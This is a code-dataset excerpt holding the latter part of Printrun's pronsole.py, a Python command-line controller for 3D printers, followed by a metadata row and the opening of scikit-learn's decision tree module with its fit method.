self.logError(_("No file name given."))
return
settings = 0
if l[0] == "set":
settings = 1
else:
self.log(_("Slicing file: %s") % l[0])
if not(os.path.exists(l[0])):
self.logError(_("File not found!"))
return
try:
if settings:
command = self.settings.sliceoptscommand
self.log(_("Entering slicer settings: %s") % command)
run_command(command, blocking = True)
else:
command = self.settings.slicecommand
stl_name = l[0]
gcode_name = stl_name.replace(".stl", "_export.gcode").replace(".STL", "_export.gcode")
run_command(command,
{"$s": stl_name,
"$o": gcode_name},
blocking = True)
self.log(_("Loading sliced file."))
self.do_load(l[0].replace(".stl", "_export.gcode"))
except Exception, e:
self.logError(_("Slicing failed: %s") % e)
def complete_slice(self, text, line, begidx, endidx):
s = line.split()
if len(s) > 2:
return []
if (len(s) == 1 and line[-1] == " ") or (len(s) == 2 and line[-1] != " "):
if len(s) > 1:
return [i[len(s[1]) - len(text):] for i in glob.glob(s[1] + "*/") + glob.glob(s[1] + "*.stl")]
else:
return glob.glob("*/") + glob.glob("*.stl")
def help_slice(self):
self.log(_("Creates a gcode file from an stl model using the slicer (with tab-completion)"))
self.log(_("slice filename.stl - create gcode file"))
self.log(_("slice filename.stl view - create gcode file and view using skeiniso (if using skeinforge)"))
self.log(_("slice set - adjust slicer settings"))
# --------------------------------------------------------------
# Print/upload handling
# --------------------------------------------------------------
def do_upload(self, l):
names = l.split()
if len(names) == 2:
filename = names[0]
targetname = names[1]
else:
self.logError(_("Please enter target name in 8.3 format."))
return
if not self.p.online:
self.logError(_("Not connected to printer."))
return
self._do_load(filename)
self.log(_("Uploading as %s") % targetname)
self.log(_("Uploading %s") % self.filename)
self.p.send_now("M28 " + targetname)
self.log(_("Press Ctrl-C to interrupt upload."))
self.p.startprint(self.fgcode)
try:
sys.stdout.write(_("Progress: ") + "00.0%")
sys.stdout.flush()
while self.p.printing:
time.sleep(0.5)
sys.stdout.write("\b\b\b\b\b%04.1f%%" % (100 * float(self.p.queueindex) / len(self.p.mainqueue),))
sys.stdout.flush()
self.p.send_now("M29 " + targetname)
time.sleep(0.2)
self.p.clear = True
self._do_ls(False)
self.log("\b\b\b\b\b100%.")
self.log(_("Upload completed. %s should now be on the card.") % targetname)
return
except (KeyboardInterrupt, Exception) as e:
if isinstance(e, KeyboardInterrupt):
self.logError(_("...interrupted!"))
else:
self.logError(_("Something wrong happened while uploading:")
+ "\n" + traceback.format_exc())
self.p.pause()
self.p.send_now("M29 " + targetname)
time.sleep(0.2)
self.p.cancelprint()
self.logError(_("A partial file named %s may have been written to the sd card.") % targetname)
def complete_upload(self, text, line, begidx, endidx):
s = line.split()
if len(s) > 2:
return []
if (len(s) == 1 and line[-1] == " ") or (len(s) == 2 and line[-1] != " "):
if len(s) > 1:
return [i[len(s[1]) - len(text):] for i in glob.glob(s[1] + "*/") + glob.glob(s[1] + "*.g*")]
else:
return glob.glob("*/") + glob.glob("*.g*")
def help_upload(self):
self.log("Uploads a gcode file to the sd card")
def help_print(self):
if not self.fgcode:
self.log(_("Send a loaded gcode file to the printer. Load a file with the load command first."))
else:
self.log(_("Send a loaded gcode file to the printer. You have %s loaded right now.") % self.filename)
def do_print(self, l):
if not self.fgcode:
self.logError(_("No file loaded. Please use load first."))
return
if not self.p.online:
self.logError(_("Not connected to printer."))
return
self.log(_("Printing %s") % self.filename)
self.log(_("You can monitor the print with the monitor command."))
self.sdprinting = False
self.p.startprint(self.fgcode)
def do_pause(self, l):
if self.sdprinting:
self.p.send_now("M25")
else:
if not self.p.printing:
self.logError(_("Not printing, cannot pause."))
return
self.p.pause()
self.paused = True
def help_pause(self):
self.log(_("Pauses a running print"))
def pause(self, event = None):
return self.do_pause(None)
def do_resume(self, l):
if not self.paused:
self.logError(_("Not paused, unable to resume. Start a print first."))
return
self.paused = False
if self.sdprinting:
self.p.send_now("M24")
return
else:
self.p.resume()
def help_resume(self):
self.log(_("Resumes a paused print."))
def listfiles(self, line):
if "Begin file list" in line:
self.sdlisting = 1
elif "End file list" in line:
self.sdlisting = 0
self.recvlisteners.remove(self.listfiles)
if self.sdlisting_echo:
self.log(_("Files on SD card:"))
self.log("\n".join(self.sdfiles))
elif self.sdlisting:
self.sdfiles.append(line.strip().lower())
def _do_ls(self, echo):
# FIXME: this was 2, but I think it should rather be 0 as in do_upload
self.sdlisting = 0
self.sdlisting_echo = echo
self.sdfiles = []
self.recvlisteners.append(self.listfiles)
self.p.send_now("M20")
def do_ls(self, l):
if not self.p.online:
self.logError(_("Printer is not online. Please connect to it first."))
return
self._do_ls(True)
def help_ls(self):
self.log(_("Lists files on the SD card"))
def waitforsdresponse(self, l):
if "file.open failed" in l:
self.logError(_("Opening file failed."))
self.recvlisteners.remove(self.waitforsdresponse)
return
if "File opened" in l:
self.log(l)
if "File selected" in l:
self.log(_("Starting print"))
self.p.send_now("M24")
self.sdprinting = True
# self.recvlisteners.remove(self.waitforsdresponse)
return
if "Done printing file" in l:
self.log(l)
self.sdprinting = False
self.recvlisteners.remove(self.waitforsdresponse)
return
if "SD printing byte" in l:
# M27 handler
try:
resp = l.split()
vals = resp[-1].split("/")
self.percentdone = 100.0 * int(vals[0]) / int(vals[1])
except:
pass
def do_reset(self, l):
self.p.reset()
def help_reset(self):
self.log(_("Resets the printer."))
def do_sdprint(self, l):
if not self.p.online:
self.log(_("Printer is not online. Please connect to it first."))
return
self._do_ls(False)
while self.listfiles in self.recvlisteners:
time.sleep(0.1)
if l.lower() not in self.sdfiles:
self.log(_("File is not present on card. Please upload it first."))
return
self.recvlisteners.append(self.waitforsdresponse)
self.p.send_now("M23 " + l.lower())
self.log(_("Printing file: %s from SD card.") % l.lower())
self.log(_("Requesting SD print..."))
time.sleep(1)
def help_sdprint(self):
self.log(_("Print a file from the SD card. Tab completes with available file names."))
self.log(_("sdprint filename.g"))
def complete_sdprint(self, text, line, begidx, endidx):
if not self.sdfiles and self.p.online:
self._do_ls(False)
while self.listfiles in self.recvlisteners:
time.sleep(0.1)
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.sdfiles if i.startswith(text)]
# --------------------------------------------------------------
# Printcore callbacks
# --------------------------------------------------------------
def startcb(self, resuming = False):
self.starttime = time.time()
if resuming:
self.log(_("Print resumed at: %s") % format_time(self.starttime))
else:
self.log(_("Print started at: %s") % format_time(self.starttime))
if not self.sdprinting:
self.compute_eta = RemainingTimeEstimator(self.fgcode)
else:
self.compute_eta = None
if self.settings.start_command:
output = get_command_output(self.settings.start_command,
{"$s": str(self.filename),
"$t": format_time(time.time())})
if output:
self.log("Start command output:")
self.log(output.rstrip())
try:
powerset_print_start(reason = "Preventing sleep during print")
except:
self.logError(_("Failed to set power settings:")
+ "\n" + traceback.format_exc())
def endcb(self):
try:
powerset_print_stop()
except:
self.logError(_("Failed to set power settings:")
+ "\n" + traceback.format_exc())
if self.p.queueindex == 0:
print_duration = int(time.time() - self.starttime + self.extra_print_time)
self.log(_("Print ended at: %(end_time)s and took %(duration)s") % {"end_time": format_time(time.time()),
"duration": format_duration(print_duration)})
# Update total filament length used
new_total = self.settings.total_filament_used + self.fgcode.filament_length
self.set("total_filament_used", new_total)
if not self.settings.final_command:
return
output = get_command_output(self.settings.final_command,
{"$s": str(self.filename),
"$t": format_duration(print_duration)})
if output:
self.log("Final command output:")
self.log(output.rstrip())
def recvcb_report(self, l):
isreport = REPORT_NONE
if "ok C:" in l or "Count" in l \
or ("X:" in l and len(gcoder.m114_exp.findall(l)) == 6):
self.posreport = l
isreport = REPORT_POS
if self.userm114 > 0:
self.userm114 -= 1
isreport |= REPORT_MANUAL
if "ok T:" in l or tempreading_exp.findall(l):
self.tempreadings = l
isreport = REPORT_TEMP
if self.userm105 > 0:
self.userm105 -= 1
isreport |= REPORT_MANUAL
else:
self.m105_waitcycles = 0
return isreport
def recvcb_actions(self, l):
if l.startswith("!!"):
self.do_pause(None)
msg = l.split(" ", 1)
if len(msg) > 1 and self.silent is False: self.logError(msg[1].ljust(15))
sys.stdout.write(self.promptf())
sys.stdout.flush()
return True
elif l.startswith("//"):
command = l.split(" ", 1)
if len(command) > 1:
command = command[1]
self.log(_("Received command %s") % command)
command = command.split(":")
if len(command) == 2 and command[0] == "action":
command = command[1]
if command == "pause":
self.do_pause(None)
sys.stdout.write(self.promptf())
sys.stdout.flush()
return True
elif command == "resume":
self.do_resume(None)
sys.stdout.write(self.promptf())
sys.stdout.flush()
return True
elif command == "disconnect":
self.do_disconnect(None)
sys.stdout.write(self.promptf())
sys.stdout.flush()
return True
return False
def recvcb(self, l):
l = l.rstrip()
for listener in self.recvlisteners:
listener(l)
if not self.recvcb_actions(l):
report_type = self.recvcb_report(l)
if report_type & REPORT_TEMP:
self.status.update_tempreading(l)
if l != "ok" and not self.sdlisting \
and not self.monitoring and (report_type == REPORT_NONE or report_type & REPORT_MANUAL):
if l[:5] == "echo:":
l = l[5:].lstrip()
if self.silent is False: self.log("\r" + l.ljust(15))
sys.stdout.write(self.promptf())
sys.stdout.flush()
def layer_change_cb(self, newlayer):
layerz = self.fgcode.all_layers[newlayer].z
if layerz is not None:
self.curlayer = layerz
if self.compute_eta:
secondselapsed = int(time.time() - self.starttime + self.extra_print_time)
self.compute_eta.update_layer(newlayer, secondselapsed)
def get_eta(self):
if self.sdprinting or self.uploading:
if self.uploading:
fractioncomplete = float(self.p.queueindex) / len(self.p.mainqueue)
else:
fractioncomplete = float(self.percentdone / 100.0)
secondselapsed = int(time.time() - self.starttime + self.extra_print_time)
# Prevent division by zero
secondsestimate = secondselapsed / max(fractioncomplete, 0.000001)
secondsremain = secondsestimate - secondselapsed
progress = fractioncomplete
elif self.compute_eta is not None:
secondselapsed = int(time.time() - self.starttime + self.extra_print_time)
secondsremain, secondsestimate = self.compute_eta(self.p.queueindex, secondselapsed)
progress = self.p.queueindex
else:
secondsremain, secondsestimate, progress = 1, 1, 0
return secondsremain, secondsestimate, progress
def do_eta(self, l):
if not self.p.printing:
self.logError(_("Printer is not currently printing. No ETA available."))
else:
secondsremain, secondsestimate, progress = self.get_eta()
eta = _("Est: %s of %s remaining") % (format_duration(secondsremain),
format_duration(secondsestimate))
self.log(eta.strip())
def help_eta(self):
self.log(_("Displays estimated remaining print time."))
# --------------------------------------------------------------
# Temperature handling
# --------------------------------------------------------------
def set_temp_preset(self, key, value):
if not key.startswith("bed"):
self.temps["pla"] = str(self.settings.temperature_pla)
self.temps["abs"] = str(self.settings.temperature_abs)
self.log("Hotend temperature presets updated, pla:%s, abs:%s" % (self.temps["pla"], self.temps["abs"]))
else:
self.bedtemps["pla"] = str(self.settings.bedtemp_pla)
self.bedtemps["abs"] = str(self.settings.bedtemp_abs)
self.log("Bed temperature presets updated, pla:%s, abs:%s" % (self.bedtemps["pla"], self.bedtemps["abs"]))
def tempcb(self, l):
if "T:" in l:
self.log(l.strip().replace("T", "Hotend").replace("B", "Bed").replace("ok ", ""))
def do_gettemp(self, l):
if "dynamic" in l:
self.dynamic_temp = True
if self.p.online:
self.p.send_now("M105")
time.sleep(0.75)
if not self.status.bed_enabled:
self.log(_("Hotend: %s/%s") % (self.status.extruder_temp, self.status.extruder_temp_target))
else:
self.log(_("Hotend: %s/%s") % (self.status.extruder_temp, self.status.extruder_temp_target))
self.log(_("Bed: %s/%s") % (self.status.bed_temp, self.status.bed_temp_target))
def help_gettemp(self):
self.log(_("Read the extruder and bed temperature."))
def do_settemp(self, l):
l = l.lower().replace(", ", ".")
for i in self.temps.keys():
l = l.replace(i, self.temps[i])
try:
f = float(l)
except:
self.logError(_("You must enter a temperature."))
return
if f >= 0:
if f > 250:
self.log(_("%s is a high temperature to set your extruder to. Are you sure you want to do that?") % f)
if not self.confirm():
return
if self.p.online:
self.p.send_now("M104 S" + l)
self.log(_("Setting hotend temperature to %s degrees Celsius.") % f)
else:
self.logError(_("Printer is not online."))
else:
self.logError(_("You cannot set negative temperatures. To turn the hotend off entirely, set its temperature to 0."))
def help_settemp(self):
self.log(_("Sets the hotend temperature to the value entered."))
self.log(_("Enter either a temperature in celsius or one of the following keywords"))
self.log(", ".join([i + "(" + self.temps[i] + ")" for i in self.temps.keys()]))
def complete_settemp(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.temps.keys() if i.startswith(text)]
def do_bedtemp(self, l):
f = None
try:
l = l.lower().replace(", ", ".")
for i in self.bedtemps.keys():
l = l.replace(i, self.bedtemps[i])
f = float(l)
except:
self.logError(_("You must enter a temperature."))
if f is not None and f >= 0:
if self.p.online:
self.p.send_now("M140 S" + l)
self.log(_("Setting bed temperature to %s degrees Celsius.") % f)
else:
self.logError(_("Printer is not online."))
else:
self.logError(_("You cannot set negative temperatures. To turn the bed off entirely, set its temperature to 0."))
def help_bedtemp(self):
self.log(_("Sets the bed temperature to the value entered."))
self.log(_("Enter either a temperature in celsius or one of the following keywords"))
self.log(", ".join([i + "(" + self.bedtemps[i] + ")" for i in self.bedtemps.keys()]))
def complete_bedtemp(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in self.bedtemps.keys() if i.startswith(text)]
def do_monitor(self, l):
interval = 5
if not self.p.online:
self.logError(_("Printer is not online. Please connect to it first."))
return
if not (self.p.printing or self.sdprinting):
self.logError(_("Printer is not printing. Please print something before monitoring."))
return
self.log(_("Monitoring printer, use ^C to interrupt."))
if len(l):
try:
interval = float(l)
except:
self.logError(_("Invalid period given."))
self.log(_("Updating values every %f seconds.") % (interval,))
self.monitoring = 1
prev_msg_len = 0
try:
while True:
self.p.send_now("M105")
if self.sdprinting:
self.p.send_now("M27")
time.sleep(interval)
if self.p.printing:
preface = _("Print progress: ")
progress = 100 * float(self.p.queueindex) / len(self.p.mainqueue)
elif self.sdprinting:
preface = _("SD print progress: ")
progress = self.percentdone
prev_msg = preface + "%.1f%%" % progress
if self.silent is False:
sys.stdout.write("\r" + prev_msg.ljust(prev_msg_len))
sys.stdout.flush()
prev_msg_len = len(prev_msg)
except KeyboardInterrupt:
if self.silent is False: self.log(_("Done monitoring."))
self.monitoring = 0
def help_monitor(self):
self.log(_("Monitor a machine's temperatures and an SD print's status."))
self.log(_("monitor - Reports temperature and SD print status (if SD printing) every 5 seconds"))
self.log(_("monitor 2 - Reports temperature and SD print status (if SD printing) every 2 seconds"))
# --------------------------------------------------------------
# Manual printer controls
# --------------------------------------------------------------
def do_tool(self, l):
tool = None
try:
tool = int(l.lower().strip())
except:
self.logError(_("You must specify the tool index as an integer."))
if tool is not None and tool >= 0:
if self.p.online:
self.p.send_now("T%d" % tool)
self.log(_("Using tool %d.") % tool)
else:
self.logError(_("Printer is not online."))
else:
self.logError(_("You cannot set negative tool numbers."))
def help_tool(self):
self.log(_("Switches to the specified tool (e.g. doing tool 1 will emit a T1 G-Code)."))
def do_move(self, l):
if len(l.split()) < 2:
self.logError(_("No move specified."))
return
if self.p.printing:
self.logError(_("Printer is currently printing. Please pause the print before you issue manual commands."))
return
if not self.p.online:
self.logError(_("Printer is not online. Unable to move."))
return
l = l.split()
if l[0].lower() == "x":
feed = self.settings.xy_feedrate
axis = "X"
elif l[0].lower() == "y":
feed = self.settings.xy_feedrate
axis = "Y"
elif l[0].lower() == "z":
feed = self.settings.z_feedrate
axis = "Z"
elif l[0].lower() == "e":
feed = self.settings.e_feedrate
axis = "E"
else:
self.logError(_("Unknown axis."))
return
try:
float(l[1]) # check if distance can be a float
except:
self.logError(_("Invalid distance"))
return
try:
feed = int(l[2])
except:
pass
self.p.send_now("G91")
self.p.send_now("G0 " + axis + str(l[1]) + " F" + str(feed))
self.p.send_now("G90")
def help_move(self):
self.log(_("Move an axis. Specify the name of the axis and the amount. "))
self.log(_("move X 10 will move the X axis forward by 10mm at %s mm/min (default XY speed)") % self.settings.xy_feedrate)
self.log(_("move Y 10 5000 will move the Y axis forward by 10mm at 5000mm/min"))
self.log(_("move Z -1 will move the Z axis down by 1mm at %s mm/min (default Z speed)") % self.settings.z_feedrate)
self.log(_("Common amounts are in the tabcomplete list."))
def complete_move(self, text, line, begidx, endidx):
if (len(line.split()) == 2 and line[-1] != " ") or (len(line.split()) == 1 and line[-1] == " "):
return [i for i in ["X ", "Y ", "Z ", "E "] if i.lower().startswith(text)]
elif len(line.split()) == 3 or (len(line.split()) == 2 and line[-1] == " "):
base = line.split()[-1]
rlen = 0
if base.startswith("-"):
rlen = 1
if line[-1] == " ":
base = ""
return [i[rlen:] for i in ["-100", "-10", "-1", "-0.1", "100", "10", "1", "0.1", "-50", "-5", "-0.5", "50", "5", "0.5", "-200", "-20", "-2", "-0.2", "200", "20", "2", "0.2"] if i.startswith(base)]
else:
return []
def do_extrude(self, l, override = None, overridefeed = 300):
length = self.settings.default_extrusion # default extrusion length
feed = self.settings.e_feedrate # default speed
if not self.p.online:
self.logError("Printer is not online. Unable to extrude.")
return
if self.p.printing:
self.logError(_("Printer is currently printing. Please pause the print before you issue manual commands."))
return
ls = l.split()
if len(ls):
try:
length = float(ls[0])
except:
self.logError(_("Invalid length given."))
if len(ls) > 1:
try:
feed = int(ls[1])
except:
self.logError(_("Invalid speed given."))
if override is not None:
length = override
feed = overridefeed
self.do_extrude_final(length, feed)
def do_extrude_final(self, length, feed):
if length > 0:
self.log(_("Extruding %fmm of filament.") % (length,))
elif length < 0:
self.log(_("Reversing %fmm of filament.") % (-length,))
else:
self.log(_("Length is 0, not doing anything."))
self.p.send_now("G91")
self.p.send_now("G1 E" + str(length) + " F" + str(feed))
self.p.send_now("G90")
def help_extrude(self):
self.log(_("Extrudes a length of filament, 5mm by default, or the number of mm given as a parameter"))
self.log(_("extrude - extrudes 5mm of filament at 300mm/min (5mm/s)"))
self.log(_("extrude 20 - extrudes 20mm of filament at 300mm/min (5mm/s)"))
self.log(_("extrude -5 - REVERSES 5mm of filament at 300mm/min (5mm/s)"))
self.log(_("extrude 10 210 - extrudes 10mm of filament at 210mm/min (3.5mm/s)"))
def do_reverse(self, l):
length = self.settings.default_extrusion # default extrusion length
feed = self.settings.e_feedrate # default speed
if not self.p.online:
self.logError(_("Printer is not online. Unable to reverse."))
return
if self.p.printing:
self.logError(_("Printer is currently printing. Please pause the print before you issue manual commands."))
return
ls = l.split()
if len(ls):
try:
length = float(ls[0])
except:
self.logError(_("Invalid length given."))
if len(ls) > 1:
try:
feed = int(ls[1])
except:
self.logError(_("Invalid speed given."))
self.do_extrude("", -length, feed)
def help_reverse(self):
self.log(_("Reverses the extruder, 5mm by default, or the number of mm given as a parameter"))
self.log(_("reverse - reverses 5mm of filament at 300mm/min (5mm/s)"))
self.log(_("reverse 20 - reverses 20mm of filament at 300mm/min (5mm/s)"))
self.log(_("reverse 10 210 - extrudes 10mm of filament at 210mm/min (3.5mm/s)"))
self.log(_("reverse -5 - EXTRUDES 5mm of filament at 300mm/min (5mm/s)"))
def do_home(self, l):
if not self.p.online:
self.logError(_("Printer is not online. Unable to move."))
return
if self.p.printing:
self.logError(_("Printer is currently printing. Please pause the print before you issue manual commands."))
return
if "x" in l.lower():
self.p.send_now("G28 X0")
if "y" in l.lower():
self.p.send_now("G28 Y0")
if "z" in l.lower():
self.p.send_now("G28 Z0")
if "e" in l.lower():
self.p.send_now("G92 E0")
if not len(l):
self.p.send_now("G28")
self.p.send_now("G92 E0")
def help_home(self):
self.log(_("Homes the printer"))
self.log(_("home - homes all axes and zeroes the extruder(Using G28 and G92)"))
self.log(_("home xy - homes x and y axes (Using G28)"))
self.log(_("home z - homes z axis only (Using G28)"))
self.log(_("home e - set extruder position to zero (Using G92)"))
self.log(_("home xyze - homes all axes and zeroes the extruder (Using G28 and G92)"))
def do_off(self, l):
self.off()
def off(self, ignore = None):
if self.p.online:
if self.p.printing: self.pause(None)
self.log(_("; Motors off"))
self.onecmd("M84")
self.log(_("; Extruder off"))
self.onecmd("M104 S0")
self.log(_("; Heatbed off"))
self.onecmd("M140 S0")
self.log(_("; Fan off"))
self.onecmd("M107")
self.log(_("; Power supply off"))
self.onecmd("M81")
else:
self.logError(_("Printer is not online. Unable to turn it off."))
def help_off(self):
self.log(_("Turns off everything on the printer"))
# --------------------------------------------------------------
# Host commands handling
# --------------------------------------------------------------
def process_host_command(self, command):
"""Override host command handling"""
command = command.lstrip()
if command.startswith(";@"):
command = command[2:]
self.log(_("G-Code calling host command \"%s\"") % command)
self.onecmd(command)
def do_run_script(self, l):
p = run_command(l, {"$s": str(self.filename)}, stdout = subprocess.PIPE)
for line in p.stdout.readlines():
self.log("<< " + line.strip())
def help_run_script(self):
self.log(_("Runs a custom script. Current gcode filename can be given using $s token."))
def do_run_gcode_script(self, l):
p = run_command(l, {"$s": str(self.filename)}, stdout = subprocess.PIPE)
for line in p.stdout.readlines():
self.onecmd(line.strip())
def help_run_gcode_script(self):
self.log(_("Runs a custom script which output gcode which will in turn be executed. Current gcode filename can be given using $s token."))
|
modulexcite/Printrun
|
printrun/pronsole.py
|
Python
|
gpl-3.0
| 68,420
|
[
"Firefly"
] |
bbfcc6fa839696699476dad8d7a7affc5cbec2c1f96e0e9fe13fd4c4488b66a8
|
"""
This module gathers tree-based methods, including decision, regression and
randomized trees. Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Noel Dawe <noel@dawe.me>
# Satrajit Gosh <satrajit.ghosh@gmail.com>
# Joly Arnaud <arnaud.v.joly@gmail.com>
# Fares Hedayati <fares.hedayati@gmail.com>
#
# Licence: BSD 3 clause
from __future__ import division
import numbers
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
from ..base import BaseEstimator, ClassifierMixin, RegressorMixin
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..utils import check_array, check_random_state, compute_class_weight
from ..utils.validation import NotFittedError, check_is_fitted
from ._tree import Criterion
from ._tree import Splitter
from ._tree import DepthFirstTreeBuilder, BestFirstTreeBuilder
from ._tree import Tree
from . import _tree
__all__ = ["DecisionTreeClassifier",
"DecisionTreeRegressor",
"ExtraTreeClassifier",
"ExtraTreeRegressor"]
# =============================================================================
# Types and constants
# =============================================================================
DTYPE = _tree.DTYPE
DOUBLE = _tree.DOUBLE
CRITERIA_CLF = {"gini": _tree.Gini, "entropy": _tree.Entropy}
CRITERIA_REG = {"mse": _tree.MSE, "friedman_mse": _tree.FriedmanMSE}
DENSE_SPLITTERS = {"best": _tree.BestSplitter,
"presort-best": _tree.PresortBestSplitter,
"random": _tree.RandomSplitter}
SPARSE_SPLITTERS = {"best": _tree.BestSparseSplitter,
"random": _tree.RandomSparseSplitter}
# =============================================================================
# Base decision tree
# =============================================================================
class BaseDecisionTree(six.with_metaclass(ABCMeta, BaseEstimator,
_LearntSelectorMixin)):
"""Base class for decision trees.
Warning: This class should not be used directly.
Use derived classes instead.
"""
@abstractmethod
def __init__(self,
criterion,
splitter,
max_depth,
min_samples_split,
min_samples_leaf,
min_weight_fraction_leaf,
max_features,
max_leaf_nodes,
random_state,
class_weight=None):
self.criterion = criterion
self.splitter = splitter
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.random_state = random_state
self.max_leaf_nodes = max_leaf_nodes
self.class_weight = class_weight
self.n_features_ = None
self.n_outputs_ = None
self.classes_ = None
self.n_classes_ = None
self.tree_ = None
self.max_features_ = None
def fit(self, X, y, sample_weight=None, check_input=True):
"""Build a decision tree from the training set (X, y).
Parameters
----------
X : array-like or sparse matrix, shape = [n_samples, n_features]
The training input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels in classification, real numbers in
regression). In the regression case, use ``dtype=np.float64`` and
``order='C'`` for maximum efficiency.
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Returns
-------
self : object
Returns self.
"""
random_state = check_random_state(self.random_state)
if check_input:
X = check_array(X, dtype=DTYPE, accept_sparse="csc")
if issparse(X):
X.sort_indices()
if X.indices.dtype != np.intc or X.indptr.dtype != np.intc:
raise ValueError("No support for np.int64 index based "
"sparse matrices")
# Determine output settings
n_samples, self.n_features_ = X.shape
is_classification = isinstance(self, ClassifierMixin)
y = np.atleast_1d(y)
expanded_class_weight = None
if y.ndim == 1:
# reshape is necessary to preserve the data contiguity against vs
# [:, np.newaxis] that does not.
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
if is_classification:
y = np.copy(y)
self.classes_ = []
self.n_classes_ = []
if self.class_weight is not None:
y_original = np.copy(y)
for k in range(self.n_outputs_):
classes_k, y[:, k] = np.unique(y[:, k], return_inverse=True)
self.classes_.append(classes_k)
self.n_classes_.append(classes_k.shape[0])
if self.class_weight is not None:
if isinstance(self.class_weight, six.string_types):
if self.class_weight != "auto":
raise ValueError('The only supported preset for '
'class_weight is "auto". Given "%s".'
% self.class_weight)
elif self.n_outputs_ > 1:
if not hasattr(self.class_weight, "__iter__"):
raise ValueError('For multi-output, class_weight '
'should be a list of dicts, or '
'"auto".')
elif len(self.class_weight) != self.n_outputs_:
raise ValueError("For multi-output, number of "
"elements in class_weight should "
"match number of outputs.")
expanded_class_weight = []
for k in range(self.n_outputs_):
if self.n_outputs_ == 1 or self.class_weight == 'auto':
class_weight_k = self.class_weight
else:
class_weight_k = self.class_weight[k]
weight_k = compute_class_weight(class_weight_k,
self.classes_[k],
y_original[:, k])
weight_k = weight_k[np.searchsorted(self.classes_[k],
y_original[:, k])]
expanded_class_weight.append(weight_k)
expanded_class_weight = np.prod(expanded_class_weight,
axis=0,
dtype=np.float64)
else:
self.classes_ = [None] * self.n_outputs_
self.n_classes_ = [1] * self.n_outputs_
self.n_classes_ = np.array(self.n_classes_, dtype=np.intp)
if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
y = np.ascontiguousarray(y, dtype=DOUBLE)
# Check parameters
max_depth = ((2 ** 31) - 1 if self.max_depth is None
else self.max_depth)
max_leaf_nodes = (-1 if self.max_leaf_nodes is None
else self.max_leaf_nodes)
if isinstance(self.max_features, six.string_types):
if self.max_features == "auto":
if is_classification:
max_features = max(1, int(np.sqrt(self.n_features_)))
else:
max_features = self.n_features_
elif self.max_features == "sqrt":
max_features = max(1, int(np.sqrt(self.n_features_)))
elif self.max_features == "log2":
max_features = max(1, int(np.log2(self.n_features_)))
else:
raise ValueError(
'Invalid value for max_features. Allowed string '
'values are "auto", "sqrt" or "log2".')
elif self.max_features is None:
max_features = self.n_features_
elif isinstance(self.max_features, (numbers.Integral, np.integer)):
max_features = self.max_features
else: # float
if self.max_features > 0.0:
max_features = max(1, int(self.max_features * self.n_features_))
else:
max_features = 0
self.max_features_ = max_features
if len(y) != n_samples:
raise ValueError("Number of labels=%d does not match "
"number of samples=%d" % (len(y), n_samples))
if self.min_samples_split <= 0:
raise ValueError("min_samples_split must be greater than zero.")
if self.min_samples_leaf <= 0:
raise ValueError("min_samples_leaf must be greater than zero.")
if not 0 <= self.min_weight_fraction_leaf <= 0.5:
raise ValueError("min_weight_fraction_leaf must in [0, 0.5]")
if max_depth <= 0:
raise ValueError("max_depth must be greater than zero. ")
if not (0 < max_features <= self.n_features_):
raise ValueError("max_features must be in (0, n_features]")
if not isinstance(max_leaf_nodes, (numbers.Integral, np.integer)):
raise ValueError("max_leaf_nodes must be integral number but was "
"%r" % max_leaf_nodes)
if -1 < max_leaf_nodes < 2:
raise ValueError(("max_leaf_nodes {0} must be either smaller than "
"0 or larger than 1").format(max_leaf_nodes))
if sample_weight is not None:
if (getattr(sample_weight, "dtype", None) != DOUBLE or
not sample_weight.flags.contiguous):
sample_weight = np.ascontiguousarray(
sample_weight, dtype=DOUBLE)
if len(sample_weight.shape) > 1:
raise ValueError("Sample weights array has more "
"than one dimension: %d" %
len(sample_weight.shape))
if len(sample_weight) != n_samples:
raise ValueError("Number of weights=%d does not match "
"number of samples=%d" %
(len(sample_weight), n_samples))
if expanded_class_weight is not None:
if sample_weight is not None:
sample_weight = sample_weight * expanded_class_weight
else:
sample_weight = expanded_class_weight
# Set min_weight_leaf from min_weight_fraction_leaf
if self.min_weight_fraction_leaf != 0. and sample_weight is not None:
min_weight_leaf = (self.min_weight_fraction_leaf *
np.sum(sample_weight))
else:
min_weight_leaf = 0.
# Set min_samples_split sensibly
min_samples_split = max(self.min_samples_split,
2 * self.min_samples_leaf)
# Build tree
criterion = self.criterion
if not isinstance(criterion, Criterion):
if is_classification:
criterion = CRITERIA_CLF[self.criterion](self.n_outputs_,
self.n_classes_)
else:
criterion = CRITERIA_REG[self.criterion](self.n_outputs_)
SPLITTERS = SPARSE_SPLITTERS if issparse(X) else DENSE_SPLITTERS
splitter = self.splitter
if not isinstance(self.splitter, Splitter):
splitter = SPLITTERS[self.splitter](criterion,
self.max_features_,
self.min_samples_leaf,
min_weight_leaf,
random_state)
self.tree_ = Tree(self.n_features_, self.n_classes_, self.n_outputs_)
# Use BestFirst if max_leaf_nodes given; use DepthFirst otherwise
if max_leaf_nodes < 0:
builder = DepthFirstTreeBuilder(splitter, min_samples_split,
self.min_samples_leaf,
min_weight_leaf,
max_depth)
else:
builder = BestFirstTreeBuilder(splitter, min_samples_split,
self.min_samples_leaf,
min_weight_leaf,
max_depth,
max_leaf_nodes)
